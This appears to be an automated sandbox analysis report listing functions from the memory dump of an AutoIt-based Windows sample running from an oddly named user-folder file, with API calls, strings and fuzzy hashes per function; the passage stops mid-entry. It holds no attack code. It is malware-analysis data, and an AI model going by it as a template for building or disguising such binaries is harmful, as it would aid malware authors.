Function 008945E0, Relevance: 24.9, APIs: 13, Strings: 1, Instructions: 395COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00894765
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00894775
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0089479D
_wcslen.LIBCMT ref: 00894865
GetCurrentDirectoryW.KERNEL32(00000000,00000000,?), ref: 00894879
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 008948A1
_wcslen.LIBCMT ref: 008948F7
_wcslen.LIBCMT ref: 0089490D
_wcslen.LIBCMT ref: 0089492C

Strings

D, xrefs: 0089460D

Memory Dump Source

Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000008.00000002.775002740.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775551308.00000000008B2000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775650092.00000000008C0000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775711575.00000000008C1000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.775770068.00000000008C2000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775845058.00000000008D7000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775881699.00000000008DB000.00000002.00020000.sdmp Download File

Similarity

API ID: _wcslen$Directory$CurrentSystem
String ID: D
API String ID: 1914653954-2746444292
Opcode ID: 3bbeeba21edd219f7b7fac84450a1b46f151e2e21a6f0287679123c2f709bbe0
Instruction ID: 7ee57265eb62e0bd2c59581431d67bdbebc01b42293a4b1e3ab8682326b10195
Opcode Fuzzy Hash: 3bbeeba21edd219f7b7fac84450a1b46f151e2e21a6f0287679123c2f709bbe0
Instruction Fuzzy Hash: 4BE179B19043459BDB10EB68C885B6BB7E4FF85304F18892CF989C7392DB35E945CB92

Uniqueness

Uniqueness Score: -1.00%

Function 00832190, Relevance: 24.7, APIs: 7, Strings: 7, Instructions: 202COMMON

Download Yara Rule

APIs

Part of subcall function 00831D10: _wcslen.LIBCMT ref: 00831D11
Part of subcall function 00831D10: _memmove.LIBCMT ref: 00831D57

__wcsicoll.LIBCMT ref: 00832262
__wcsicoll.LIBCMT ref: 00832278
__wcsicoll.LIBCMT ref: 0083228E

Part of subcall function 008413CB: __wcsicmp_l.LIBCMT ref: 0084144B

__wcsicoll.LIBCMT ref: 008322A4
_wcscpy.LIBCMT ref: 008322C4
GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\33920049\fmkkelc.omp,00000104), ref: 00858AD6
_wcscpy.LIBCMT ref: 00858B29

Strings

CMDLINERAW, xrefs: 008321CF
CMDLINE, xrefs: 008321F8
C:\Users\user\33920049\fmkkelc.omp, xrefs: 008321B9, 008321C0, 008322B4, 008322BF, 00858ABE, 00858B24
/AutoIt3ExecuteLine, xrefs: 00832289
/AutoIt3OutputDebug, xrefs: 00832273
/AutoIt3ExecuteScript, xrefs: 0083229F
/ErrorStdOut, xrefs: 0083225D

Memory Dump Source

Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000008.00000002.775002740.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775551308.00000000008B2000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775650092.00000000008C0000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775711575.00000000008C1000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.775770068.00000000008C2000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775845058.00000000008D7000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775881699.00000000008DB000.00000002.00020000.sdmp Download File

Similarity

API ID: __wcsicoll$_wcscpy$FileModuleName__wcsicmp_l_memmove_wcslen
String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$C:\Users\user\33920049\fmkkelc.omp$CMDLINE$CMDLINERAW
API String ID: 574121520-2838865966
Opcode ID: 1b9920e976ce1c0cc48c6d2cb8c87b3fc4a10e725ce38efe8f3c10b95e90912c
Instruction ID: f650ac663a816a13eb0726218a4f1fe806c3d302c16348ec01ae282da884d9fb
Opcode Fuzzy Hash: 1b9920e976ce1c0cc48c6d2cb8c87b3fc4a10e725ce38efe8f3c10b95e90912c
Instruction Fuzzy Hash: 02716D71D1021A9BCF10EBA8DC56AEEB775FF80354F000425E901F7292EBB46949CBE2

Uniqueness

Uniqueness Score: -1.00%

Function 0089910A, Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 253windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32 ref: 00899155
GetFocus.USER32 ref: 00899169
GetDlgCtrlID.USER32(00000000), ref: 00899174
PostMessageW.USER32 ref: 008991C8

Strings

0, xrefs: 008992CB

Memory Dump Source

Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000008.00000002.775002740.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775551308.00000000008B2000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775650092.00000000008C0000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775711575.00000000008C1000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.775770068.00000000008C2000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775845058.00000000008D7000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775881699.00000000008DB000.00000002.00020000.sdmp Download File

Similarity

API ID: MessagePost$CtrlFocus
String ID: 0
API String ID: 1534620443-4108050209
Opcode ID: b3298488f92bf5de418653bd2cd3c3314788538c2a5a2a5c765012f32d35e44b
Instruction ID: 723520bb70912ef2d56ca1d0e1cf613140c627aa8c46d9f51a1f67c5cf662617
Opcode Fuzzy Hash: b3298488f92bf5de418653bd2cd3c3314788538c2a5a2a5c765012f32d35e44b
Instruction Fuzzy Hash: FC91D171604315AFDB20EF58DC89BABB7A8FB98714F08461DF995D3281D7B0D844CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 008905C5, Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 136windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,00000066,?,00000FFF,00000010,00000001,?,?,00857F37,?,0000138C,?,00000001,?,?,?), ref: 008905F5
LoadStringW.USER32(00000000,?,00857F37,?), ref: 008905FC

Part of subcall function 00831D10: _wcslen.LIBCMT ref: 00831D11
Part of subcall function 00831D10: _memmove.LIBCMT ref: 00831D57

GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,00857F37,?,0000138C,?,00000001,?,?,?,?,?,00000000), ref: 0089061C
LoadStringW.USER32(00000000,?,00857F37,?), ref: 00890623
__swprintf.LIBCMT ref: 00890661
__swprintf.LIBCMT ref: 00890679
_wprintf.LIBCMT ref: 0089072D
MessageBoxW.USER32(00000000,?,?,00011010), ref: 00890746

Strings

^ ERROR, xrefs: 008906CF
Line %d:, xrefs: 0089065B
Line %d (File "%s"):, xrefs: 00890673
%s (%d) : ==> %s: %s %s, xrefs: 00890728
Error: , xrefs: 008906F8

Memory Dump Source

Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000008.00000002.775002740.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775551308.00000000008B2000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775650092.00000000008C0000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775711575.00000000008C1000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.775770068.00000000008C2000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775845058.00000000008D7000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775881699.00000000008DB000.00000002.00020000.sdmp Download File

Similarity

API ID: HandleLoadModuleString__swprintf$Message_memmove_wcslen_wprintf
String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
API String ID: 3631882475-2268648507
Opcode ID: d0488c6f28dc10e6c0624593cf3d35d6af4a09846a4950dc491a9332b8cabefd
Instruction ID: fe9739281af123eb6572f86d56e7779b14dbb45e2a586d76b07f4bf4351c92b5
Opcode Fuzzy Hash: d0488c6f28dc10e6c0624593cf3d35d6af4a09846a4950dc491a9332b8cabefd
Instruction Fuzzy Hash: BC414C72900209ABDB00FBA8DC86EEE773CFF95751F444125F604E7251DA306A45CBB2

Uniqueness

Uniqueness Score: -1.00%

Function 008A2095, Relevance: 21.4, APIs: 11, Strings: 1, Instructions: 377timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 008A225C
__swprintf.LIBCMT ref: 008A2273
SHGetFolderPathW.SHELL32(00000000,00000026,00000000,00000000,008BBF48), ref: 008A24A6
SHGetFolderPathW.SHELL32(00000000,0000002B,00000000,00000000,008BBF48), ref: 008A24C0
SHGetFolderPathW.SHELL32(00000000,00000005,00000000,00000000,008BBF48), ref: 008A24DA
SHGetFolderPathW.SHELL32(00000000,00000023,00000000,00000000,008BBF48), ref: 008A24F4
SHGetFolderPathW.SHELL32(00000000,00000019,00000000,00000000,008BBF48), ref: 008A250E
SHGetFolderPathW.SHELL32(00000000,0000002E,00000000,00000000,008BBF48), ref: 008A2528
SHGetFolderPathW.SHELL32(00000000,0000001F,00000000,00000000,008BBF48), ref: 008A2542
SHGetFolderPathW.SHELL32(00000000,00000017,00000000,00000000,008BBF48), ref: 008A255C
SHGetFolderPathW.SHELL32(00000000,00000016,00000000,00000000,008BBF48), ref: 008A2576

Strings

%.3d, xrefs: 008A2267

Memory Dump Source

Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000008.00000002.775002740.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775551308.00000000008B2000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775650092.00000000008C0000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775711575.00000000008C1000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.775770068.00000000008C2000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775845058.00000000008D7000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775881699.00000000008DB000.00000002.00020000.sdmp Download File

Similarity

API ID: FolderPath$LocalTime__swprintf
String ID: %.3d
API String ID: 3337348382-986655627
Opcode ID: 825db87fb4fd582f0d3c4730b26f3f748a930942e789b31a8fb342d3c5613ebf
Instruction ID: b8ef6a61914ecea3981d4dcb6f7318d1d95f092fff292fddbc5b05f4d8bec1f8
Opcode Fuzzy Hash: 825db87fb4fd582f0d3c4730b26f3f748a930942e789b31a8fb342d3c5613ebf
Instruction Fuzzy Hash: DDC1DA3265421C9BDB24FF68DC8AFEE7378FB84701F4045A9F509E7182DB719A058BA1

Uniqueness

Uniqueness Score: -1.00%

Function 0089138A, Relevance: 21.3, APIs: 11, Strings: 1, Instructions: 294windowtimeCOMMON

Download Yara Rule

APIs

GetClassNameW.USER32 ref: 008913C4
_wcslen.LIBCMT ref: 008913CF
__swprintf.LIBCMT ref: 0089146D
SendMessageTimeoutW.USER32 ref: 008914E0
GetClassNameW.USER32 ref: 0089155D
GetDlgCtrlID.USER32(?), ref: 008915B5
GetWindowRect.USER32 ref: 008915F0
GetParent.USER32(?), ref: 0089160F
ScreenToClient.USER32 ref: 00891616
GetClassNameW.USER32 ref: 0089168D
GetWindowTextW.USER32 ref: 008916CA

Strings

%s%u, xrefs: 00891467

Memory Dump Source

Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000008.00000002.775002740.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775551308.00000000008B2000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775650092.00000000008C0000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775711575.00000000008C1000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.775770068.00000000008C2000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775845058.00000000008D7000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775881699.00000000008DB000.00000002.00020000.sdmp Download File

Similarity

API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_wcslen
String ID: %s%u
API String ID: 1899580136-679674701
Opcode ID: 448f9eb104a0be0d38f5fe563cea30de7aaacd7a82b889f2601169ca34114a54
Instruction ID: 1bdbd395f74c901dc4c1f0c09c026851ec4bc6362246ef8aa4b1f63b74c3a5d5
Opcode Fuzzy Hash: 448f9eb104a0be0d38f5fe563cea30de7aaacd7a82b889f2601169ca34114a54
Instruction Fuzzy Hash: D0A181725083029BDF11EF54C889BAA77A9FF94310F088929FD99DB245D730E946CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00861329, Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 160windowCOMMON

Download Yara Rule

APIs

GetDC.USER32 ref: 0086139D
CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 008613AE
CreateCompatibleDC.GDI32(00000000), ref: 008613B8
SelectObject.GDI32(00000000,?), ref: 008613C5
StretchBlt.GDI32(00000000,00000000,00000000,?,?,?,?,?,?,?,00CC0020), ref: 0086142B
GetDIBits.GDI32(00000000,?,00000000,00000000,00000000,?,00000000), ref: 00861464

Strings

(, xrefs: 0086144C

Memory Dump Source

Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000008.00000002.775002740.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775551308.00000000008B2000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775650092.00000000008C0000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775711575.00000000008C1000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.775770068.00000000008C2000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775845058.00000000008D7000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775881699.00000000008DB000.00000002.00020000.sdmp Download File

Similarity

API ID: CompatibleCreate$BitmapBitsObjectSelectStretch
String ID: (
API String ID: 3300687185-3887548279
Opcode ID: 183246d21b7df04fbfe9a16e8e796c67646d0b1323cf7216c6c2ea59b0d7b204
Instruction ID: 2fc8e2c016b45bf1cd458c5d9519145493eaa4e3d1ef01aa83bd89453216ede8
Opcode Fuzzy Hash: 183246d21b7df04fbfe9a16e8e796c67646d0b1323cf7216c6c2ea59b0d7b204
Instruction Fuzzy Hash: BF513671A00209AFDB14CFA8C889FAFBBB9FF49710F148519F95A97340D774A945CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0086000A, Relevance: 21.1, APIs: 14, Instructions: 134filecommemoryCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000), ref: 00860030
GetFileSize.KERNEL32(00000000,00000000), ref: 0086004B
GlobalAlloc.KERNEL32(00000002,00000000), ref: 00860056
GlobalLock.KERNEL32 ref: 00860063
ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00860072
GlobalUnlock.KERNEL32(00000000), ref: 00860079
CloseHandle.KERNEL32(00000000), ref: 00860080
CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 0086008D
OleLoadPicture.OLEAUT32(?,00000000,00000000,008B29F8,?), ref: 008600AB
GlobalFree.KERNEL32 ref: 008600BD
GetObjectW.GDI32(?,00000018,?), ref: 008600E4
CopyImage.USER32(?,00000000,?,?,00002000), ref: 00860115
DeleteObject.GDI32(?), ref: 0086013D
SendMessageW.USER32(?,00000172,00000000,00000000), ref: 00860154

Memory Dump Source

Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000008.00000002.775002740.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775551308.00000000008B2000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775650092.00000000008C0000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775711575.00000000008C1000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.775770068.00000000008C2000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775845058.00000000008D7000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775881699.00000000008DB000.00000002.00020000.sdmp Download File

Similarity

API ID: Global$File$CreateObject$AllocCloseCopyDeleteFreeHandleImageLoadLockMessagePictureReadSendSizeStreamUnlock
String ID:
API String ID: 3969911579-0
Opcode ID: 74dddf0a85320eb5390cfa040a9c9b4bbfbdac8b9c68382547cfbebcb760dc33
Instruction ID: f86c311f2dc33e8132fbad8cb403e8ff9f441cfcd571d517bfb4b74bc7170bca
Opcode Fuzzy Hash: 74dddf0a85320eb5390cfa040a9c9b4bbfbdac8b9c68382547cfbebcb760dc33
Instruction Fuzzy Hash: 6A415E75600608AFD710DFA4DC89FAAB7B8FF49711F108255F905EB290D774AD01CB64

Uniqueness

Uniqueness Score: -1.00%

Function 0088516A, Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 115windowCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32 ref: 008851A3
DeleteMenu.USER32(?,?,00000000), ref: 0088520F
DeleteMenu.USER32(?,?,00000000), ref: 00885225
GetMenuItemCount.USER32(?), ref: 00885236
SetMenu.USER32(?,00000000), ref: 00885244
DestroyMenu.USER32(?,?,00000000), ref: 00885251
DrawMenuBar.USER32 ref: 00885264
DeleteObject.GDI32(?), ref: 008856AB
DeleteObject.GDI32(?), ref: 008856B9
DestroyIcon.USER32(?), ref: 008856C7
DestroyWindow.USER32(?), ref: 008856D5

Strings

0, xrefs: 0088517C

Memory Dump Source

Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000008.00000002.775002740.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775551308.00000000008B2000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775650092.00000000008C0000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775711575.00000000008C1000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.775770068.00000000008C2000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775845058.00000000008D7000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775881699.00000000008DB000.00000002.00020000.sdmp Download File

Similarity

API ID: Menu$Delete$Destroy$ItemObject$CountDrawIconInfoWindow
String ID: 0
API String ID: 956284711-4108050209
Opcode ID: fc1b405000ea848567b9db3eaa2d0ef6c0e6512eeba26c21ce9a43935e303bf9
Instruction ID: f9c96731877e69a840ce33c5c9d06285147292aca91a3665fd3ba96ba925cbe8
Opcode Fuzzy Hash: fc1b405000ea848567b9db3eaa2d0ef6c0e6512eeba26c21ce9a43935e303bf9
Instruction Fuzzy Hash: FB415B70304702AFD724EF68D898B6AB7A8FF48301F548A18F955CB291EB74EC41CB61

Uniqueness

Uniqueness Score: -1.00%

Function 00863478, Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 84networkCOMMON

Download Yara Rule

APIs

WSAStartup.WSOCK32(00000101,?), ref: 00863495
gethostname.WSOCK32(?,00000100), ref: 008634AF
gethostbyname.WSOCK32(?), ref: 008634BC
_wcscpy.LIBCMT ref: 008634EB
WSACleanup.WSOCK32 ref: 008634F3
_memmove.LIBCMT ref: 0086350A
inet_ntoa.WSOCK32(?), ref: 00863516
_strcat.LIBCMT ref: 00863524
_wcscpy.LIBCMT ref: 0086353B
WSACleanup.WSOCK32 ref: 00863549
_wcscpy.LIBCMT ref: 0086355B

Strings

0.0.0.0, xrefs: 008634E5

Memory Dump Source

Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000008.00000002.775002740.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775551308.00000000008B2000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775650092.00000000008C0000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775711575.00000000008C1000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.775770068.00000000008C2000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775845058.00000000008D7000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775881699.00000000008DB000.00000002.00020000.sdmp Download File

Similarity

API ID: _wcscpy$Cleanup$Startup_memmove_strcatgethostbynamegethostnameinet_ntoa
String ID: 0.0.0.0
API String ID: 1965227024-3771769585
Opcode ID: 2105124a96208f216c8bce17197ee2d10b4a2dd1d2f98a55913826c45377f2de
Instruction ID: 06c5a5319636ffadd6c4a43dd3416c3500155e2076fdde7f576b74e65ca64088
Opcode Fuzzy Hash: 2105124a96208f216c8bce17197ee2d10b4a2dd1d2f98a55913826c45377f2de
Instruction Fuzzy Hash: 90210A32A00118ABCB10AB68DC09EFA736CFF95311F004399F909D7141EE719A858BB5

Uniqueness

Uniqueness Score: -1.00%

Function 0088F55A, Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 78COMMON

Download Yara Rule

APIs

Part of subcall function 00832390: _wcslen.LIBCMT ref: 0083239D
Part of subcall function 00832390: _memmove.LIBCMT ref: 008323C3

mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 0088F5C2
mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 0088F5D9
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0088F5EB
mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 0088F5FE
mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 0088F60B
mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 0088F621

Strings

alias PlayMe, xrefs: 0088F59C
status PlayMe mode, xrefs: 0088F5BD
play PlayMe, xrefs: 0088F61C
play PlayMe wait, xrefs: 0088F5F9
open , xrefs: 0088F571
close PlayMe, xrefs: 0088F5D4, 0088F606

Memory Dump Source

Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000008.00000002.775002740.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775551308.00000000008B2000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775650092.00000000008C0000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775711575.00000000008C1000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.775770068.00000000008C2000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775845058.00000000008D7000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775881699.00000000008DB000.00000002.00020000.sdmp Download File

Similarity

API ID: SendString$_memmove_wcslen
String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
API String ID: 369157077-1007645807
Opcode ID: 133002d91b6a89e2f507b6ca9474431c0e49d426394cb940520eba4c76fc684f
Instruction ID: 0ddaf11d6d6770fdbd8fdb9661c04fec5b3ebd3d4b1db8ad52425da1e9b60b7c
Opcode Fuzzy Hash: 133002d91b6a89e2f507b6ca9474431c0e49d426394cb940520eba4c76fc684f
Instruction Fuzzy Hash: 4321907169031D26E720F798DC42FFE7368FBC0B41F100525F614EA2D2DAB0694487D9

Uniqueness

Uniqueness Score: -1.00%

Function 00879112, Relevance: 19.7, APIs: 13, Instructions: 246windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,?,000000FF,?), ref: 008791FD
SendMessageW.USER32(?,?,00000000,00000000), ref: 00879210
CharNextW.USER32(?,?,?,000000FF,?), ref: 00879242
SendMessageW.USER32(?,?,00000000,00000000), ref: 0087925A
SendMessageW.USER32(?,?,00000000,?), ref: 0087928B
SendMessageW.USER32(?,?,000000FF,?), ref: 008792A2
SendMessageW.USER32(?,?,00000000,00000000), ref: 008792B5
SendMessageW.USER32(?,00000402,?), ref: 008792F2
SendMessageW.USER32(?,000000C2,00000001,?), ref: 00879366
SendMessageW.USER32(?,00001002,00000000,?), ref: 008793D0

Memory Dump Source

Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000008.00000002.775002740.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775551308.00000000008B2000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775650092.00000000008C0000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775711575.00000000008C1000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.775770068.00000000008C2000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775845058.00000000008D7000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775881699.00000000008DB000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSend$CharNext
String ID:
API String ID: 1350042424-0
Opcode ID: 45b0c78bd1c726f8174ea5f7c123f18386458c9c5afc43c091300cca5af5b469
Instruction ID: 271ffc0308c19e7daeaba2b1567c681f6e7423064630eb510bab7ddcd3d6be56
Opcode Fuzzy Hash: 45b0c78bd1c726f8174ea5f7c123f18386458c9c5afc43c091300cca5af5b469
Instruction Fuzzy Hash: 6981C135A00208ABDB10DF98DC85FFEB778FB55720F10825AFA28DB284D775D9418BA0

Uniqueness

Uniqueness Score: -1.00%

Function 00883126, Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 160COMMON

Download Yara Rule

APIs

__itow.LIBCMT ref: 0088315E
__i64tow.LIBCMT ref: 0088317B
__swprintf.LIBCMT ref: 0088319C
__swprintf.LIBCMT ref: 008831B8
_wcscpy.LIBCMT ref: 008831D6
_wcscpy.LIBCMT ref: 00883212

Strings

True, xrefs: 008831D0
0x%p, xrefs: 008831B2
%.15g, xrefs: 00883196
False, xrefs: 008831E9

Memory Dump Source

Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000008.00000002.775002740.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775551308.00000000008B2000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775650092.00000000008C0000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775711575.00000000008C1000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.775770068.00000000008C2000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775845058.00000000008D7000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775881699.00000000008DB000.00000002.00020000.sdmp Download File

Similarity

API ID: __swprintf_wcscpy$__i64tow__itow
String ID: %.15g$0x%p$False$True
API String ID: 3038501623-2263619337
Opcode ID: 0efd7f6c5decb93695daee2f8bef770f7c7b7c592c3271355b160bd4beb82ec2
Instruction ID: 5de1d383a92897c40020c681df0c5f250ea7837f66c0980e9dfc8c2f19b46b67
Opcode Fuzzy Hash: 0efd7f6c5decb93695daee2f8bef770f7c7b7c592c3271355b160bd4beb82ec2
Instruction Fuzzy Hash: 90410B729001189BDB10FB78DC46F66B368FF55701F0449B5E909CB246EB35DA58C793

Uniqueness

Uniqueness Score: -1.00%

Function 0088E525, Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 154COMMON

Download Yara Rule

APIs

LoadStringW.USER32(?,00000066,?,00000FFF), ref: 0088E56D

Part of subcall function 00831D10: _wcslen.LIBCMT ref: 00831D11
Part of subcall function 00831D10: _memmove.LIBCMT ref: 00831D57

LoadStringW.USER32(?,00000072,?,00000FFF), ref: 0088E58C
__swprintf.LIBCMT ref: 0088E5E3
_wprintf.LIBCMT ref: 0088E690
_wprintf.LIBCMT ref: 0088E6B4

Strings

^ ERROR , xrefs: 0088E626
Line %d (File "%s"):, xrefs: 0088E5DD
Error: , xrefs: 0088E657
%s (%d) : ==> %s:%s%s, xrefs: 0088E68B
%s (%d) : ==> %s:, xrefs: 0088E6AF

Memory Dump Source

Source File: 00000008.00000002.775037190.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000008.00000002.775002740.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775551308.00000000008B2000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.775650092.00000000008C0000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775711575.00000000008C1000.00000008.00020000.sdmp Download File
Associated: 00000008.00000002.775770068.00000000008C2000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775845058.00000000008D7000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.775881699.00000000008DB000.00000002.00020000.sdmp Download File

Similarity

API ID: LoadString_wprintf$__swprintf_memmove_wcslen
String ID: Error: $%s (%d) : ==> %s:$%s (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
API String ID: 2295938435-8599901
Opcode ID: 6b1fe4212ee996596bb50b373caed1211638ff5a27cddd72ec3176fef0e86d4f
Instruction ID: 49b39f855109d43306d690471ca532102d220fe2983cb5492a8192eac5396008
Opcode Fuzzy Hash: 6b1fe4212ee996596bb50b373caed1211638ff5a27cddd72ec3176fef0e86d4f
Instruction Fuzzy Hash: 18518571D002099BDB14EBA8DC86EEFB778FF95740F508025F915E7252EA30AE45CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 008A1493, Relevance: 18.1, APIs: 12, Instructions: 132windowCOMMON

Download Yara Rule

APIs

GetWindowLongW.USER32 ref: 008A1496
LoadImageW.USER32 ref: 008A14B1
SendMessageW.USER32(?,000000F7,00000000,00000000), ref: 008A14CA
DeleteObject.GDI32(?), ref: 008A14D8
DestroyIcon.USER32(?,?,000000F7,00000000,00000000,?,000000F0), ref: 008A14E6
